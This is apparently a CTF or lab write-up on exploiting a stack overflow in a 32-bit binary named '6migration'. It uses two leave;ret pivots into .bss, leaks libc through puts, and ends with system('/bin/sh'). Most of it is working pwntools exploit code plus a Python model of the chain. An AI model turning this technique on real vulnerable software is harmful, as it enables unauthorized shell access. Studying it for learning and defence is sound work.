checksec shows NX is enabled.
Load the binary into IDA.
There is a stack overflow: read() reads 0x40 bytes into buf, which only has 0x28 bytes of space, so 0x40 - 0x28 = 0x18 bytes overflow. After the saved ebp and the return address that leaves just 0x10 bytes of controllable payload, which is far too short to hold a full ROP chain, so we have to migrate the stack (a stack pivot).
Stack migration:
Overwrite the saved ebp with a fake_ebp of our choosing, then use a leave;ret gadget to move esp to the address held in fake_ebp.
leave = mov esp, ebp ; pop ebp. The ret that follows pops the new eip from the migrated stack, so whatever we placed at fake_ebp+4 is the next address executed.
0x804a000 0x804b000 rw-p 1000 1000 /home/yoona/Desktop/lab/6migration
First, pivot the stack into the .bss segment. The payload fills buf, sets fake ebp = bss1 and returns into read(0, bss1, 0x100), with leave_ret as read's return address so that the next stage, which read() writes to bss1, becomes the new stack:
payload = b'a'*0x28
payload += p32(bss1) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss1) + p32(0x100)
Then leak libc's memory layout with puts.
While leaking, the stack has to be migrated again to another area we control (bss2). The first dword of this stage is popped into ebp by the leave;ret from stage 1, puts(puts_got) prints the resolved address of puts, pop_ebx discards the argument, and read(0, bss2, 0x100) fetches the final stage, which the trailing leave;ret pivots onto:
payload = p32(bss2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss2) + p32(0x100)
p.send(payload)
puts_addr = u32(p.recv(4))
print("puts_addr:" + hex(puts_addr))
offset = puts_addr - puts_libc
system_addr = system_libc + offset
binsh = binsh_libc + offset
Finally, call system. This stage is read into bss2; the leading dword is the fake ebp (system never returns, so its value does not matter), followed by system's address, a dummy return address and the pointer to "/bin/sh":
payload = p32(bss1) + p32(system_addr) + b"bbbb" + p32(binsh)
p.send(payload)
p.interactive()
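To make the two pivots concrete, the following is an added example, not code from the write-up: a tiny model of the chain in pure Python (no pwntools) that executes the three stages with the same leave;ret, pop ebx;ret, read and puts semantics and records where esp lands after each pivot. Every address and libc offset in it (BSS, READ_PLT, PUTS_PLT, PUTS_GOT, LIBC_BASE, PUTS_OFF, SYSTEM_OFF, BINSH_OFF, VULN_EBP) is a constructed stand-in; in the real exploit those come from the ELF, the local libc and the gadget search.

```python
import struct


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


def u32(b):
    return struct.unpack("<I", b)[0]


# Constructed addresses (hypothetical stand-ins; only their roles matter for the model).
BSS = 0x0804A000                        # writable page from the write-up's memory map
BSS1, BSS2 = BSS + 0x500, BSS + 0x400   # same offsets as the write-up's bss1/bss2
READ_PLT, PUTS_PLT = 0x08048300, 0x08048310
LEAVE_RET, POP_EBX = 0x08048418, 0x0804836D   # gadget addresses quoted in the write-up
PUTS_GOT = 0x0804A010
LIBC_BASE = 0xF7E00000
PUTS_OFF, SYSTEM_OFF, BINSH_OFF = 0x5F140, 0x3A940, 0x15902B   # constructed libc offsets
VULN_EBP = 0xFFFFD0B8                   # saved ebp of the vulnerable frame (constructed)


class CPU:
    """Just enough x86-32 to follow a cdecl pivot chain: sparse byte memory,
    esp/ebp/eip, and handlers for the four addresses the chain returns into."""

    def __init__(self):
        self.mem = {}
        self.esp = self.ebp = self.eip = 0
        self.inputs = []   # data handed to successive read() calls
        self.output = []   # dwords leaked by puts()
        self.trace = []    # (eip, esp, ebp) before each step

    def write(self, addr, data):
        for i, byte in enumerate(data):
            self.mem[addr + i] = byte

    def rd(self, addr):
        return u32(bytes(self.mem.get(addr + i, 0) for i in range(4)))

    def pop(self):
        value = self.rd(self.esp)
        self.esp += 4
        return value

    def step(self):
        self.trace.append((self.eip, self.esp, self.ebp))
        if self.eip == LEAVE_RET:        # mov esp, ebp ; pop ebp ; ret
            self.esp = self.ebp
            self.ebp = self.pop()
            self.eip = self.pop()
        elif self.eip == POP_EBX:        # pop ebx ; ret (consumes puts' argument slot)
            self.pop()
            self.eip = self.pop()
        elif self.eip == READ_PLT:       # read(fd, buf, n): ret popped, args stay on the stack
            ret = self.pop()
            buf, n = self.rd(self.esp + 4), self.rd(self.esp + 8)
            self.write(buf, self.inputs.pop(0)[:n])
            self.eip = ret
        elif self.eip == PUTS_PLT:       # puts(s): model the leak as the dword at s
            ret = self.pop()
            self.output.append(self.rd(self.rd(self.esp)))
            self.eip = ret
        else:
            return False                 # reached an address we do not model (system)
        return True


def run_exploit():
    cpu = CPU()
    cpu.write(PUTS_GOT, p32(LIBC_BASE + PUTS_OFF))   # GOT entry already resolved
    # Stage 1: overflow of buf (ebp-0x28); fake ebp = BSS1, return into read(0, BSS1, 0x100)
    stage1 = (b"a" * 0x28 + p32(BSS1) + p32(READ_PLT) + p32(LEAVE_RET)
              + p32(0) + p32(BSS1) + p32(0x100))
    assert len(stage1) == 0x40           # exactly what the vulnerable read() accepts
    cpu.write(VULN_EBP - 0x28, stage1)
    # Stage 2 is what that read() receives: it lands at BSS1, then leave;ret pivots onto it
    cpu.inputs.append(p32(BSS2) + p32(PUTS_PLT) + p32(POP_EBX) + p32(PUTS_GOT)
                      + p32(READ_PLT) + p32(LEAVE_RET) + p32(0) + p32(BSS2) + p32(0x100))
    cpu.ebp, cpu.eip = VULN_EBP, LEAVE_RET   # the vulnerable function's own epilogue
    while True:
        if cpu.eip == READ_PLT and not cpu.inputs:
            # Stage 3 can only be built once the leak has arrived, as in the real script
            base = cpu.output[0] - PUTS_OFF
            cpu.inputs.append(p32(BSS1) + p32(base + SYSTEM_OFF) + b"bbbb" + p32(base + BINSH_OFF))
        if not cpu.step():
            return cpu


def pivots(cpu):
    """The esp installed by each leave;ret, i.e. where the stack lived at each stage."""
    return [ebp for eip, esp, ebp in cpu.trace if eip == LEAVE_RET]


if __name__ == "__main__":
    cpu = run_exploit()
    for eip, esp, ebp in cpu.trace:
        print(f"eip={eip:#010x} esp={esp:#010x} ebp={ebp:#010x}")
    print("stack moved through:", [hex(a) for a in pivots(cpu)])
    print("final eip =", hex(cpu.eip), "arg =", hex(cpu.rd(cpu.esp + 4)))
```

Running it shows esp passing through the original frame, then bss1, then bss2: each stage's first dword is the ebp that the next leave;ret turns into esp, and each stage's read() places the following stage at the address named in that stage's own arguments. The model ends with eip at system's address, the dummy "bbbb" in the return-address slot and the "/bin/sh" pointer as the first argument.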
Script:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
p = process('./6migration')
elf = ELF("./6migration")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

# Symbols from the binary and the local libc
system_libc = libc.symbols["system"]
print("system_libc:" + hex(system_libc))
read_plt = elf.plt["read"]
print("read_plt:" + hex(read_plt))
puts_got = elf.got["puts"]
print("puts_got:" + hex(puts_got))
puts_plt = elf.plt["puts"]
print("puts_plt:" + hex(puts_plt))
puts_libc = libc.symbols["puts"]
print("puts_libc:" + hex(puts_libc))
binsh_libc = next(libc.search(b"/bin/sh"))
print("binsh_libc:" + hex(binsh_libc))

# Two scratch areas in the writable .bss page; each later stage is read into one of them
bss1 = elf.bss() + 0x500
bss2 = elf.bss() + 0x400
pop_ebx = 0x0804836d    # pop ebx ; ret
leave_ret = 0x08048418  # leave ; ret

# Stage 1: fill buf (0x28 bytes), fake ebp = bss1, return into read(0, bss1, 0x100),
# and have read return into leave;ret so that esp moves to bss1
payload = b'a' * 0x28
payload += p32(bss1) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss1) + p32(0x100)
p.recvuntil(b" :\n")
p.send(payload)

# Stage 2 (lands at bss1): fake ebp = bss2, puts(puts_got) leaks libc, pop_ebx discards
# the argument, read(0, bss2, 0x100) fetches stage 3, leave;ret moves esp to bss2
payload = p32(bss2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss2) + p32(0x100)
p.send(payload)
puts_addr = u32(p.recv(4))
print("puts_addr:" + hex(puts_addr))
offset = puts_addr - puts_libc   # libc base
system_addr = system_libc + offset
binsh = binsh_libc + offset

# Stage 3 (lands at bss2): fake ebp (never used), system("/bin/sh") with a dummy return address
payload = p32(bss1) + p32(system_addr) + b"bbbb" + p32(binsh)
#payload = p32(0) + p32(system_addr) + b"bbbb" + p32(binsh)
p.send(payload)
p.interactive()
I don't understand why the stack has to be migrated twice, nor how the two addresses were arrived at.